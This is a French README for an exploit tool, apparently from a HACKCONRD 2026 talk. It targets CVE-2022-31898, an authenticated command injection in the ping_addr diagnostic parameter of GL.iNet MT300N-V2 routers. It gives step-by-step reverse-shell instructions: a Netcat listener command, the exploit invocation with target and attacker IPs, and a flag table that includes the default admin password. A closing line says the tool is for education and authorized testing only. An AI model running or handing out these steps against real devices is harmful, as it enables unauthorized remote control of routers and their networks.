
Outil d'injection de commandes authentifié (CVE-2022-31898) - HACKCONRD 2026.
__ __ _____ _
| \/ | | __ \ | |
| \ / | __ _ _ __ __ _ ___ | |__) | _ _ __ ___| |__
| |\/| |/ _` | '_ \ / _` |/ _ \| ___/ | | | '_ \ / __| '_ \
| | | | (_| | | | | (_| | (_) | | | |_| | | | | (__| | | |
|_| |_|\__,_|_| |_|\__, |\___/|_| \__,_|_| |_|\___|_| |_|
__/ |
|___/
Ce dépôt contient une preuve de concept (PoC) technique pour une vulnérabilité d'exécution de commandes à distance (RCE) trouvée dans le GL.iNet MT300N-V2 (Mango) et d'autres modèles exécutant des versions de firmware inférieures à 3.215.
Le défaut existe dans le paramètre ping_addr de l'API de diagnostic, permettant à un attaquant authentifié d'exécuter des commandes système arbitraires via des métacaractères shell (;).
Ouvrez un terminal sur votre machine d'attaque (Kali Linux) et démarrez un listener Netcat :
nc -lvnp 9292
Utilisez la commande suivante pour déclencher le reverse shell :
python3 mangopunch.py -R <TARGET_IP> -L <YOUR_IP> -l <YOUR_LISTERNER_PORT> -p <PASSWORD>
| Flag | Nom complet | Description | Défaut |
|---|---|---|---|
-R | --rhost | IP cible distante (routeur) | Required |
-P | --rport | Port de gestion Web | 443 |
-L | --lhost | IP du listener (Kali/attaquant) | Required |
-l | --lport | Port du listener | Required |
-p | --pwd | Mot de passe administrateur | goodlife |
-t | --https | Activer HTTPS | False |
Avertissement : Cet outil est uniquement destiné à des fins éducatives et de tests de sécurité autorisés. L'auteur n'est pas responsable de toute utilisation abusive.